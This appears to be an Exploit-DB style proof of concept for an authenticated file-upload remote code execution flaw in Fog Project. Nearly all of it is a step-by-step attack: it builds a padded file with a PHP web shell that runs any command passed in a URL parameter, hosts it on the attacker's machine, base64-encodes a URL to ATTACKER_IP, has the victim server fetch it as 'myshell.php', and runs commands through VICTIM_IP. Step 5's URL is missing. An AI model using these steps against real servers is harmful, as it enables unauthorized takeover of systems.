# Exploit Title: Fog Project - File Upload RCE (Authenticated)  
# Date: 2021-04-28  
# Exploit Author:  
# Vendor Homepage:  
# Software Link:  
# Tested on: Debian 10  
On the Attacker Machine:  
1) Create an empty 10Mb file.  
dd if=/dev/zero of=myshell bs=10485760 count=1  
2) Add your PHP code to the end of the file created in the step 1.  
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell  
3) Put the file "myshell" accessible through HTTP.  
$ cp myshell /var/www/html  
4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).  
$ echo "http://ATTACKER_IP/myshell" | base64  
5) Visit   
6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php   
and click on Install.  
7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname